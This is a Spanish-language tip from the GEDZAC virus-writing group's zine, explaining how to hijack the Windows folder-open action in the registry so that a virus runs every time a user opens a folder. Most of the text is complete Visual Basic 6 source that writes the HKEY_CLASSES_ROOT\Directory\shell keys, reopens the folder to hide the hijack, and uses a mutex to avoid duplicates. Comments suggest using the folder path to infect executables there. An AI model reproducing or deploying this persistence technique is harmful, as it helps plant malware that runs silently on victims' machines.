Ejecutarnos cuando se abre una carpeta:
----------------------------------------

Recomendado leer antes "Interceptacion de ejecutables" en los articulos
de www.gedzac.com

Esto no ser un articulo, sino solamente un Tip que me parecio interesante

Estaba probando un Programa P2P que me recomendo un amigo, pa bajar
canciones, y como esas cosas tan llenas de spyware, pos me puse a ver que
hacia el spyware que me habia instalado, y me sorprendio que si cerraba
el proceso, cuando abria una carpeta se volvia a ejecutar, pa no hacer
larga la historia:

Aplicando la teoria de lo de interceptar los ejecutables, cuando uno abre
una carpeta, win consulta el registro para ver con que debe abrir las
carpetas, entonces modificaremos el reg para que win ejecute el virus,
el virus leera su linea de comandos para obtener el path de la carpeta
la abrira, verificara si ya se esta ejecutando, en caso de ya estar
en ejecucion terminara, pa no tener una instancia del virus
por cada carpeta abierta

La ruta del reg es:

HKEY_CLASSES_ROOT\Directory\shell\(Predeterminado) = ""

Donde el valor predeterminado es: "" ķ none ,por defecto esta vacio,
hay podemos indicar el nombre de la accion predeterminada que win
ejecutara, cuando se abra una carpeta, si vemos la llave veremos que
dentro de shell, hay varias acciones:


HKEY_CLASSES_ROOT
    |
    |-Directory
         |
         |-shell\(Predeterminado)=""
            |
            |-Accion1
            |  -command\(Predeterminado)="linea de commando"
            |
            |-Accion2
            |  -command\(Predeterminado)="linea de commando"
            |
            |-Accion3
            |  -command\(Predeterminado)="linea de commando"
            |
            |.....


Entonces vemos que hay varias acciones, que son las opciones que aparecen
al dar click derecho sobre la carpeta, en mi caso: "Buscar",
"play in winamp", "browse con ACDsee", etc y "linea de commando" define
que debe hacer win si se selecciona esa accion, como por ejemplo
ejecutar el winamp, o el acdsee.
Si en el (Predeterminado) de shell colocamos "Accion2", entonces win
ejecutara Accion2 como predeterminada cada vez que el user trate de
abrir una carpeta, entonces crearemos una nueva accion que ejecute nuestro
virusy la pondremos como predeterminada, de manera que quede asi:


HKEY_CLASSES_ROOT
    |
    |-Directory
         |
         |-shell\(Predeterminado)="GEDZAC"
            |
            |-Accion1
            |  -command\(Predeterminado)="linea de commando"
            |
            |-Accion2
            |  -command\(Predeterminado)="linea de commando"
            |
            |-Accion3
            |  -command\(Predeterminado)="linea de commando"
            |  
            |-GEDZAC
            |  -command\(Predeterminado)="C:\test.exe "%1" %*"
            |......



Code Ejemplo:
--------------
Este programa al ejecutarse, modificara el reg y cuando se abra una carpeta
mostrara su ruta en un Msgbox y mostrara la carpeta, para probarlo compilarlo
como test.exe ejecutarlo desde c:\test.exe


'Apis y constantes que usaremos
Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Long, phkResult As Long, lpdwDisposition As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
Private Declare Function CreateMutex Lib "kernel32" Alias "CreateMutexA" (ByRef lpMutexAttributes As SECURITY_ATTRIBUTES, ByVal bInitialOwner As Long, ByVal lpName As String) As Long
'Private Declare Function GetLastError Lib "kernel32" () As Long
Private Const ERROR_ALREADY_EXISTS = 183&
Private Const SW_NORMAL = 1
Private Const REG_SZ = 1
Private Const REG_DWORD = 4
Private Const KEY_ALL_ACCESS = &H3F
Private Const REG_OPTION_NON_VOLATILE = 0
Private Const HKEY_CLASSES_ROOT As Long = &H80000000
Private Const HKEY_CURRENT_USER As Long = &H80000001
Private Const HKEY_LOCAL_MACHINE As Long = &H80000002
Private Type SECURITY_ATTRIBUTES
 nLength As Long
 lpSecurityDescriptor As Long
 bInheritHandle As Long
End Type

Private Sub Form_Load()
On Error Resume Next
'declaramos vars
Dim l As Long, cmd As String, c As Long

'llamamos a GetCommandline para averiguar nuestra linea
'de commandos, no usar la declaracion de esta api que viene con el visor
'de api en vb6, porque no funka en WinXP, sino declararla como long
'devuelve un puntero a nuestra linea de commandos
l = GetCommandLine()

'calculamos el tamaņo de nuestra linea de commandos
c = lstrlen(l)

'llenamos cmd de tantos nulls como el tamaņo de la linea de comandos - 1
cmd = String$(c - 1, 0)

'copiamos l en cmd y ya tenemos en cmd, nuestra linea de commandos
'que sera en caso de ejecutarse solo:  "c:\ruta\virus.exe"
'si hay alguna carpeta que abrir: c:\ruta\virus.exe "c:\rutacarpeta"
lstrcpy cmd, l

'si cmd contiene un espacio seguido de una comilla hay que ejecutar una
'carpeta
If InStr(cmd, " " & Chr(34)) <> 0 Then

'obtenemos el path de la carpeta, y ya que tenemos el path, podriamos
'usarlo para infectar los exes en esa carpeta ademas de abrir la carpeta
 cmd = Mid$(Left$(cmd, c - 1), InStr(cmd, " " & Chr(34)) + 2)
 cmd = Left$(cmd, Len(cmd) - 1)

'mostramos el path
MsgBox cmd

'abrimos la carpeta, ejecutando: Explorer.exe C:\ruta de carpeta
Call WinExec("Explorer.exe " & cmd, SW_NORMAL)

'si no hay carpeta que mostrar
Else

'llamamos al sub para modificar el reg
Call Install
End If

'creamos un mutex para saber si ya nos estamos ejecutando
'si no hay error, permanecemos en ejecucion, si hay error de que ya existe el
'mutex, terminamos, recordar que cuando estemos probando el code cerrar
'el mutex con api CloseHandle, sino el mutex permanecera aun despues de
'terminado el programa y eso nos puede estorbar tal vez en las pruebas
Dim Mutex As SECURITY_ATTRIBUTES
Mutex.lpSecurityDescriptor = 0
Mutex.nLength = Len(Mutex)
Mutex.bInheritHandle = 1

l = CreateMutex(Mutex, 1, "GEDZAC")

'Err.LastDllError se puede reemplazar por la api GetLastError
If (Err.LastDllError = ERROR_ALREADY_EXISTS) Then
End
End If
End Sub

'sub para modificar el reg
Private Sub Install()
On Error Resume Next
Rw "HKCR", "Directory\shell", "", "GEDZAC", "SZ"
Rw "HKCR", "Directory\shell\GEDZAC\command", "", "C:\test.exe " & Chr(34) & "%1" & Chr(34) & " %*", "SZ"
End
End Sub

'Sub para escribir en el reg
Private Sub Rw(rKey As String, sKey As String, nKey As String, vKey As Variant, mVal As String)
On Error Resume Next

'declaramos variables
Dim RK As Long, l As Long, hKey As Long

'un select para saber en que llave raiz vamos a escribir
Select Case rKey
Case "HKCR"
RK = HKEY_CLASSES_ROOT
Case "HKCU"
RK = HKEY_CURRENT_USER
Case "HKLM"
RK = HKEY_LOCAL_MACHINE
End Select

'Usamos RegCreateKeyEx en vez de RegOpenKeyEx porque si no existe
'la llave la crea y sino solo la abre
'REG_OPTION_NON_VOLATILE para que los datos escritos se
'conserven despues del reinicio y KEY_ALL_ACCESS para tener acceso
'total a la llave
l = RegCreateKeyEx(RK, sKey, ByVal 0&, vbNullString, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, ByVal 0&, hKey, l)

'select para ver si lo que vamos a escribir es un valor de
'cadena o dword
Select Case mVal
Case "SZ"

'si es valor de cadena, usamos REG_SZ
Dim sVal As String
 sVal = vKey
 l = RegSetValueEx(hKey, nKey, 0&, REG_SZ, ByVal sVal, Len(sVal) + 1)

'si es un valor dword usamos REG_DWORD
Case "DW"
Dim lVal As Long
lVal = vKey
 l = RegSetValueEx(hKey, nKey, 0&, REG_DWORD, lVal, 4)
End Select

'cerramos la llave
l = RegCloseKey(hKey)
End Sub



(C) Mitosis 3 - GEDZAC LABS